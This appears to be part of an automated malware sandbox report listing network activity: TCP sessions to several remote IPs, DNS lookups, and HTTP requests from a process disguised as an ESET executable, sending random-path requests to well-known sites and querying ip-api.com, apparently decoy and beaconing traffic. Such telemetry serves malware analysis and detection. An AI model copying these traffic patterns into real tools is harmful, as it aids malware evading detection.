Dec 1, 2024 22:53:01.169429064 CET	49782	8001	192.168.2.16	185.189.159.121
Dec 1, 2024 22:53:01.413414001 CET	8001	49782	185.189.159.121	192.168.2.16
Dec 1, 2024 22:53:01.413521051 CET	49782	8001	192.168.2.16	185.189.159.121
Dec 1, 2024 22:53:01.665389061 CET	8001	49782	185.189.159.121	192.168.2.16
Dec 1, 2024 22:53:01.665478945 CET	49782	8001	192.168.2.16	185.189.159.121
Dec 1, 2024 22:53:01.675858974 CET	80	49783	172.217.19.164	192.168.2.16
Dec 1, 2024 22:53:01.677354097 CET	80	49783	172.217.19.164	192.168.2.16
Dec 1, 2024 22:53:01.677418947 CET	49783	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:53:01.680195093 CET	49784	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:53:01.800132990 CET	8080	49784	65.21.49.163	192.168.2.16
Dec 1, 2024 22:53:01.800244093 CET	49784	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:53:01.800460100 CET	49784	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:53:01.913435936 CET	8001	49782	185.189.159.121	192.168.2.16
Dec 1, 2024 22:53:01.913532019 CET	49782	8001	192.168.2.16	185.189.159.121
Dec 1, 2024 22:53:01.920289040 CET	8080	49784	65.21.49.163	192.168.2.16
Dec 1, 2024 22:53:02.154593945 CET	49784	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:53:02.161531925 CET	8001	49782	185.189.159.121	192.168.2.16
Dec 1, 2024 22:53:02.263231993 CET	8001	49782	185.189.159.121	192.168.2.16
Dec 1, 2024 22:53:02.274658918 CET	8080	49784	65.21.49.163	192.168.2.16
Dec 1, 2024 22:53:02.274673939 CET	8080	49784	65.21.49.163	192.168.2.16
Dec 1, 2024 22:53:02.274723053 CET	49784	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:53:02.274755955 CET	8080	49784	65.21.49.163	192.168.2.16
Dec 1, 2024 22:53:02.274760008 CET	49784	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:53:02.274794102 CET	8080	49784	65.21.49.163	192.168.2.16
Dec 1, 2024 22:53:02.274797916 CET	49784	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:53:02.274802923 CET	8080	49784	65.21.49.163	192.168.2.16
Dec 1, 2024 22:53:02.274847031 CET	49784	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:53:02.274868965 CET	49784	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:53:02.274939060 CET	8080	49784	65.21.49.163	192.168.2.16
Dec 1, 2024 22:53:02.274947882 CET	8080	49784	65.21.49.163	192.168.2.16
Dec 1, 2024 22:53:02.274991989 CET	49784	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:53:02.275094032 CET	8080	49784	65.21.49.163	192.168.2.16
Dec 1, 2024 22:53:02.275104046 CET	8080	49784	65.21.49.163	192.168.2.16
Dec 1, 2024 22:53:02.275135040 CET	8080	49784	65.21.49.163	192.168.2.16
Dec 1, 2024 22:53:02.275150061 CET	49784	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:53:02.275176048 CET	49784	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:53:02.394742966 CET	8080	49784	65.21.49.163	192.168.2.16
Dec 1, 2024 22:53:02.394768000 CET	8080	49784	65.21.49.163	192.168.2.16
Dec 1, 2024 22:53:02.394835949 CET	8080	49784	65.21.49.163	192.168.2.16
Dec 1, 2024 22:53:02.394845009 CET	8080	49784	65.21.49.163	192.168.2.16
Dec 1, 2024 22:53:02.394841909 CET	49784	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:53:02.394902945 CET	49784	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:53:02.394907951 CET	8080	49784	65.21.49.163	192.168.2.16
Dec 1, 2024 22:53:02.394962072 CET	49784	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:53:02.437350988 CET	8080	49784	65.21.49.163	192.168.2.16
Dec 1, 2024 22:53:02.437473059 CET	49784	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:53:02.557403088 CET	8080	49784	65.21.49.163	192.168.2.16
Dec 1, 2024 22:53:02.557495117 CET	49784	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:53:02.601389885 CET	8080	49784	65.21.49.163	192.168.2.16
Dec 1, 2024 22:53:02.601521969 CET	49784	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:53:02.721400023 CET	8080	49784	65.21.49.163	192.168.2.16
Dec 1, 2024 22:53:02.721523046 CET	49784	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:53:02.789377928 CET	8080	49784	65.21.49.163	192.168.2.16
Dec 1, 2024 22:53:02.969399929 CET	8080	49784	65.21.49.163	192.168.2.16
Dec 1, 2024 22:53:02.969485044 CET	49784	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:53:03.217457056 CET	8080	49784	65.21.49.163	192.168.2.16
Dec 1, 2024 22:53:03.217714071 CET	49784	8080	192.168.2.16	65.21.49.163
Dec 1, 2024 22:53:03.465423107 CET	8080	49784	65.21.49.163	192.168.2.16
Dec 1, 2024 22:53:04.062746048 CET	8080	49784	65.21.49.163	192.168.2.16
Dec 1, 2024 22:53:04.068451881 CET	49783	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:53:04.068674088 CET	49785	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:53:04.188636065 CET	9090	49785	167.86.115.218	192.168.2.16
Dec 1, 2024 22:53:04.188766003 CET	49785	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:53:04.188797951 CET	80	49783	172.217.19.164	192.168.2.16
Dec 1, 2024 22:53:04.188991070 CET	49785	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:53:04.189026117 CET	49783	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:53:04.308804989 CET	9090	49785	167.86.115.218	192.168.2.16
Dec 1, 2024 22:53:04.543555975 CET	49785	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:53:04.663589001 CET	9090	49785	167.86.115.218	192.168.2.16
Dec 1, 2024 22:53:04.663672924 CET	9090	49785	167.86.115.218	192.168.2.16
Dec 1, 2024 22:53:04.663683891 CET	9090	49785	167.86.115.218	192.168.2.16
Dec 1, 2024 22:53:04.663692951 CET	9090	49785	167.86.115.218	192.168.2.16
Dec 1, 2024 22:53:04.663753033 CET	49785	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:53:04.663757086 CET	9090	49785	167.86.115.218	192.168.2.16
Dec 1, 2024 22:53:04.663788080 CET	49785	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:53:04.663795948 CET	9090	49785	167.86.115.218	192.168.2.16
Dec 1, 2024 22:53:04.663808107 CET	49785	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:53:04.663810968 CET	9090	49785	167.86.115.218	192.168.2.16
Dec 1, 2024 22:53:04.663824081 CET	9090	49785	167.86.115.218	192.168.2.16
Dec 1, 2024 22:53:04.663835049 CET	49785	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:53:04.663863897 CET	49785	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:53:04.663883924 CET	49785	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:53:04.663889885 CET	9090	49785	167.86.115.218	192.168.2.16
Dec 1, 2024 22:53:04.663899899 CET	9090	49785	167.86.115.218	192.168.2.16
Dec 1, 2024 22:53:04.664010048 CET	49785	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:53:04.783746958 CET	9090	49785	167.86.115.218	192.168.2.16
Dec 1, 2024 22:53:04.783791065 CET	9090	49785	167.86.115.218	192.168.2.16
Dec 1, 2024 22:53:04.783828974 CET	49785	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:53:04.783859015 CET	49785	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:53:04.783899069 CET	9090	49785	167.86.115.218	192.168.2.16
Dec 1, 2024 22:53:04.783907890 CET	9090	49785	167.86.115.218	192.168.2.16
Dec 1, 2024 22:53:04.783935070 CET	9090	49785	167.86.115.218	192.168.2.16
Dec 1, 2024 22:53:04.783952951 CET	49785	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:53:04.784006119 CET	49785	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:53:04.825388908 CET	9090	49785	167.86.115.218	192.168.2.16
Dec 1, 2024 22:53:04.825506926 CET	49785	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:53:04.945365906 CET	9090	49785	167.86.115.218	192.168.2.16
Dec 1, 2024 22:53:04.945532084 CET	49785	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:53:04.989387989 CET	9090	49785	167.86.115.218	192.168.2.16
Dec 1, 2024 22:53:04.989464045 CET	49785	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:53:05.109607935 CET	9090	49785	167.86.115.218	192.168.2.16
Dec 1, 2024 22:53:05.109682083 CET	49785	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:53:05.173410892 CET	9090	49785	167.86.115.218	192.168.2.16
Dec 1, 2024 22:53:05.353424072 CET	9090	49785	167.86.115.218	192.168.2.16
Dec 1, 2024 22:53:05.353507042 CET	49785	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:53:05.601391077 CET	9090	49785	167.86.115.218	192.168.2.16
Dec 1, 2024 22:53:05.601485968 CET	49785	9090	192.168.2.16	167.86.115.218
Dec 1, 2024 22:53:05.849433899 CET	9090	49785	167.86.115.218	192.168.2.16
Dec 1, 2024 22:53:06.392051935 CET	9090	49781	167.86.115.218	192.168.2.16
Dec 1, 2024 22:53:06.394557953 CET	49786	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:06.514523983 CET	8080	49786	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:06.514651060 CET	49786	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:06.514858007 CET	49786	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:06.634727955 CET	8080	49786	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:06.878530025 CET	49786	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:06.998723984 CET	8080	49786	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:06.998735905 CET	8080	49786	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:06.998769999 CET	8080	49786	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:06.998805046 CET	8080	49786	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:06.998822927 CET	49786	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:06.998846054 CET	49786	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:06.998864889 CET	8080	49786	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:06.998872995 CET	8080	49786	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:06.998873949 CET	49786	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:06.998902082 CET	8080	49786	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:06.998919010 CET	49786	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:06.998925924 CET	8080	49786	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:06.998954058 CET	49786	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:06.998970985 CET	49786	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:06.998999119 CET	8080	49786	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:06.999008894 CET	8080	49786	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:06.999053001 CET	49786	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:07.118771076 CET	8080	49786	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:07.118844986 CET	8080	49786	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:07.118849993 CET	49786	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:07.118856907 CET	8080	49786	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:07.118902922 CET	49786	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:07.118937016 CET	8080	49786	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:07.118947029 CET	8080	49786	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:07.118990898 CET	49786	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:07.161467075 CET	8080	49786	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:07.161571026 CET	49786	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:07.281466961 CET	8080	49786	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:07.281555891 CET	49786	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:07.325457096 CET	8080	49786	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:07.325525045 CET	49786	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:07.445514917 CET	8080	49786	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:07.445589066 CET	49786	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:07.509392977 CET	8080	49786	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:07.689435959 CET	8080	49786	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:07.689497948 CET	49786	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:07.937402964 CET	8080	49786	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:07.937484980 CET	49786	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:08.189512968 CET	8080	49786	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:26.173670053 CET	9090	49785	167.86.115.218	192.168.2.16
Dec 1, 2024 22:53:26.176738024 CET	49787	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:26.296725988 CET	8080	49787	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:26.296808004 CET	49787	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:26.297007084 CET	49787	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:26.416918039 CET	8080	49787	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:26.660656929 CET	49787	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:26.780802965 CET	8080	49787	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:26.780852079 CET	8080	49787	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:26.780867100 CET	49787	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:26.780914068 CET	8080	49787	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:26.780920982 CET	49787	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:26.780951977 CET	8080	49787	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:26.780970097 CET	49787	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:26.781002045 CET	49787	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:26.781037092 CET	8080	49787	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:26.781076908 CET	8080	49787	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:26.781080961 CET	49787	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:26.781130075 CET	49787	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:26.781167030 CET	8080	49787	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:26.781183958 CET	8080	49787	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:26.781212091 CET	49787	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:26.781234026 CET	8080	49787	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:26.781256914 CET	49787	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:26.781276941 CET	49787	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:26.781301975 CET	8080	49787	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:26.781352997 CET	49787	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:26.900973082 CET	8080	49787	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:26.900985003 CET	8080	49787	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:26.901034117 CET	49787	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:26.901062965 CET	8080	49787	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:26.901072025 CET	8080	49787	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:26.901122093 CET	49787	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:26.901256084 CET	8080	49787	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:26.901299953 CET	49787	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:26.945378065 CET	8080	49787	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:26.945492029 CET	49787	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:27.061364889 CET	8080	49787	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:27.066013098 CET	49787	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:27.109355927 CET	8080	49787	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:27.113993883 CET	49787	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:27.233383894 CET	8080	49787	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:27.234056950 CET	49787	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:27.301393032 CET	8080	49787	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:27.481380939 CET	8080	49787	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:27.485996008 CET	49787	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:27.737472057 CET	8080	49787	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:27.742003918 CET	49787	8080	192.168.2.16	46.226.106.173
Dec 1, 2024 22:53:27.989370108 CET	8080	49787	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:28.454958916 CET	8080	49786	46.226.106.173	192.168.2.16
Dec 1, 2024 22:53:28.457361937 CET	49788	443	192.168.2.16	89.46.80.136
Dec 1, 2024 22:53:28.457398891 CET	443	49788	89.46.80.136	192.168.2.16
Dec 1, 2024 22:53:28.457479000 CET	49788	443	192.168.2.16	89.46.80.136
Dec 1, 2024 22:53:28.457999945 CET	49788	443	192.168.2.16	89.46.80.136
Dec 1, 2024 22:53:28.458017111 CET	443	49788	89.46.80.136	192.168.2.16
Dec 1, 2024 22:53:33.304127932 CET	443	49788	89.46.80.136	192.168.2.16
Dec 1, 2024 22:53:33.304235935 CET	49788	443	192.168.2.16	89.46.80.136
Dec 1, 2024 22:53:33.306365967 CET	49788	443	192.168.2.16	89.46.80.136
Dec 1, 2024 22:53:33.306381941 CET	443	49788	89.46.80.136	192.168.2.16
Dec 1, 2024 22:53:33.306874037 CET	49789	443	192.168.2.16	89.46.80.136
Dec 1, 2024 22:53:33.306901932 CET	443	49789	89.46.80.136	192.168.2.16
Dec 1, 2024 22:53:33.307209969 CET	49789	443	192.168.2.16	89.46.80.136
Dec 1, 2024 22:53:33.307574034 CET	49789	443	192.168.2.16	89.46.80.136
Dec 1, 2024 22:53:33.307585001 CET	443	49789	89.46.80.136	192.168.2.16
Dec 1, 2024 22:53:38.065992117 CET	443	49789	89.46.80.136	192.168.2.16
Dec 1, 2024 22:53:38.066143036 CET	49789	443	192.168.2.16	89.46.80.136
Dec 1, 2024 22:53:38.068407059 CET	49789	443	192.168.2.16	89.46.80.136
Dec 1, 2024 22:53:38.068420887 CET	443	49789	89.46.80.136	192.168.2.16

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 1, 2024 22:51:41.585185051 CET	53828	53	192.168.2.16	1.1.1.1
Dec 1, 2024 22:51:41.595875025 CET	60430	53	192.168.2.16	1.1.1.1
Dec 1, 2024 22:51:41.666480064 CET	61100	53	192.168.2.16	1.1.1.1
Dec 1, 2024 22:51:41.685826063 CET	50326	53	192.168.2.16	1.1.1.1
Dec 1, 2024 22:51:41.723150015 CET	53	53828	1.1.1.1	192.168.2.16
Dec 1, 2024 22:51:41.964294910 CET	53	60430	1.1.1.1	192.168.2.16
Dec 1, 2024 22:51:42.068682909 CET	53	61100	1.1.1.1	192.168.2.16
Dec 1, 2024 22:51:42.115461111 CET	53	50326	1.1.1.1	192.168.2.16
Dec 1, 2024 22:51:42.547157049 CET	62342	53	192.168.2.16	1.1.1.1
Dec 1, 2024 22:51:42.774205923 CET	53	62342	1.1.1.1	192.168.2.16
Dec 1, 2024 22:51:44.463148117 CET	63964	53	192.168.2.16	1.1.1.1
Dec 1, 2024 22:51:44.705024958 CET	53	63964	1.1.1.1	192.168.2.16
Dec 1, 2024 22:51:45.116271973 CET	59850	53	192.168.2.16	1.1.1.1
Dec 1, 2024 22:51:45.664505005 CET	53	59850	1.1.1.1	192.168.2.16
Dec 1, 2024 22:51:49.178693056 CET	59021	53	192.168.2.16	1.1.1.1
Dec 1, 2024 22:51:49.316553116 CET	53	59021	1.1.1.1	192.168.2.16
Dec 1, 2024 22:52:09.562398911 CET	65350	53	192.168.2.16	1.1.1.1
Dec 1, 2024 22:52:09.700967073 CET	53	65350	1.1.1.1	192.168.2.16
Dec 1, 2024 22:52:12.967551947 CET	54398	53	192.168.2.16	1.1.1.1
Dec 1, 2024 22:52:13.107819080 CET	53	54398	1.1.1.1	192.168.2.16
Dec 1, 2024 22:52:14.816379070 CET	59135	53	192.168.2.16	1.1.1.1
Dec 1, 2024 22:52:14.953710079 CET	53	59135	1.1.1.1	192.168.2.16

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 1, 2024 22:51:41.585185051 CET	192.168.2.16	1.1.1.1	0x40b8	Standard query (0)	twitter.com	A (IP address)	IN (0x0001)	false
Dec 1, 2024 22:51:41.595875025 CET	192.168.2.16	1.1.1.1	0x7e2a	Standard query (0)	archive.torproject.org	A (IP address)	IN (0x0001)	false
Dec 1, 2024 22:51:41.666480064 CET	192.168.2.16	1.1.1.1	0x56c7	Standard query (0)	cybereason.com	A (IP address)	IN (0x0001)	false
Dec 1, 2024 22:51:41.685826063 CET	192.168.2.16	1.1.1.1	0x7dcf	Standard query (0)	youtube.kz	A (IP address)	IN (0x0001)	false
Dec 1, 2024 22:51:42.547157049 CET	192.168.2.16	1.1.1.1	0x5c4d	Standard query (0)	google.kz	A (IP address)	IN (0x0001)	false
Dec 1, 2024 22:51:44.463148117 CET	192.168.2.16	1.1.1.1	0x82f6	Standard query (0)	blog.cyble.com	A (IP address)	IN (0x0001)	false
Dec 1, 2024 22:51:45.116271973 CET	192.168.2.16	1.1.1.1	0x3703	Standard query (0)	cyware.com	A (IP address)	IN (0x0001)	false
Dec 1, 2024 22:51:49.178693056 CET	192.168.2.16	1.1.1.1	0xce93	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Dec 1, 2024 22:52:09.562398911 CET	192.168.2.16	1.1.1.1	0xae38	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Dec 1, 2024 22:52:12.967551947 CET	192.168.2.16	1.1.1.1	0x96d7	Standard query (0)	cyble.com	A (IP address)	IN (0x0001)	false
Dec 1, 2024 22:52:14.816379070 CET	192.168.2.16	1.1.1.1	0x9c87	Standard query (0)	x.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 1, 2024 22:51:41.723150015 CET	1.1.1.1	192.168.2.16	0x40b8	No error (0)	twitter.com		104.244.42.129	A (IP address)	IN (0x0001)	false
Dec 1, 2024 22:51:41.964294910 CET	1.1.1.1	192.168.2.16	0x7e2a	No error (0)	archive.torproject.org	archive-01.torproject.org		CNAME (Canonical name)	IN (0x0001)	false
Dec 1, 2024 22:51:41.964294910 CET	1.1.1.1	192.168.2.16	0x7e2a	No error (0)	archive-01.torproject.org		159.69.63.226	A (IP address)	IN (0x0001)	false
Dec 1, 2024 22:51:42.068682909 CET	1.1.1.1	192.168.2.16	0x56c7	No error (0)	cybereason.com		45.60.107.106	A (IP address)	IN (0x0001)	false
Dec 1, 2024 22:51:42.068682909 CET	1.1.1.1	192.168.2.16	0x56c7	No error (0)	cybereason.com		45.60.62.106	A (IP address)	IN (0x0001)	false
Dec 1, 2024 22:51:42.115461111 CET	1.1.1.1	192.168.2.16	0x7dcf	No error (0)	youtube.kz		172.217.19.238	A (IP address)	IN (0x0001)	false
Dec 1, 2024 22:51:42.774205923 CET	1.1.1.1	192.168.2.16	0x5c4d	No error (0)	google.kz		172.217.19.164	A (IP address)	IN (0x0001)	false
Dec 1, 2024 22:51:44.705024958 CET	1.1.1.1	192.168.2.16	0x82f6	No error (0)	blog.cyble.com		104.26.6.177	A (IP address)	IN (0x0001)	false
Dec 1, 2024 22:51:44.705024958 CET	1.1.1.1	192.168.2.16	0x82f6	No error (0)	blog.cyble.com		104.26.7.177	A (IP address)	IN (0x0001)	false
Dec 1, 2024 22:51:44.705024958 CET	1.1.1.1	192.168.2.16	0x82f6	No error (0)	blog.cyble.com		172.67.75.191	A (IP address)	IN (0x0001)	false
Dec 1, 2024 22:51:45.664505005 CET	1.1.1.1	192.168.2.16	0x3703	No error (0)	cyware.com		66.33.60.67	A (IP address)	IN (0x0001)	false
Dec 1, 2024 22:51:49.316553116 CET	1.1.1.1	192.168.2.16	0xce93	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Dec 1, 2024 22:52:09.700967073 CET	1.1.1.1	192.168.2.16	0xae38	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Dec 1, 2024 22:52:13.107819080 CET	1.1.1.1	192.168.2.16	0x96d7	No error (0)	cyble.com		192.0.78.152	A (IP address)	IN (0x0001)	false
Dec 1, 2024 22:52:13.107819080 CET	1.1.1.1	192.168.2.16	0x96d7	No error (0)	cyble.com		192.0.78.231	A (IP address)	IN (0x0001)	false
Dec 1, 2024 22:52:14.953710079 CET	1.1.1.1	192.168.2.16	0x9c87	No error (0)	x.com		104.244.42.65	A (IP address)	IN (0x0001)	false
Dec 1, 2024 22:52:14.953710079 CET	1.1.1.1	192.168.2.16	0x9c87	No error (0)	x.com		104.244.42.1	A (IP address)	IN (0x0001)	false
Dec 1, 2024 22:52:14.953710079 CET	1.1.1.1	192.168.2.16	0x9c87	No error (0)	x.com		104.244.42.193	A (IP address)	IN (0x0001)	false
Dec 1, 2024 22:52:14.953710079 CET	1.1.1.1	192.168.2.16	0x9c87	No error (0)	x.com		104.244.42.129	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

twitter.com

cyble.com

x.com

cybereason.com

youtube.kz

google.kz

blog.cyble.com

cyware.com

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.16	49700	104.244.42.129	80	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:51:41.899389982 CET	77	OUT	GET /fheJKe6dsz?s=164 HTTP/1.1 Host: twitter.com Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.16	49702	104.244.42.129	80	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:51:42.094588041 CET	76	OUT	GET /0My2dPrz2a?s=27 HTTP/1.1 Host: twitter.com Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.16	49703	45.60.107.106	80	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:51:42.196475983 CET	79	OUT	GET /oQJb3GUymA?s=13 HTTP/1.1 Host: cybereason.com Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.16	49704	45.60.107.106	80	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:51:42.197175026 CET	79	OUT	GET /oQJb3GUymA?s=13 HTTP/1.1 Host: cybereason.com Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.16	49705	172.217.19.238	80	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:51:42.244020939 CET	118	OUT	POST /G4XvFNPg1L?27=1 HTTP/1.1 Host: youtube.kz Content-Length: 27 Expect: 100-continue Connection: Keep-Alive
Dec 1, 2024 22:51:42.626421928 CET	27	OUT	Data Raw: 4c 9f 5c ab 37 10 ef 4b b9 0b 9b ed 05 ae da 40 51 4b bb 57 9d 06 8e c4 c7 5a 3a Data Ascii: L\7K@QKWZ:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.16	49706	172.217.19.238	80	4212	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:51:42.248301983 CET	118	OUT	POST /G4XvFNPg1L?27=1 HTTP/1.1 Host: youtube.kz Content-Length: 27 Expect: 100-continue Connection: Keep-Alive
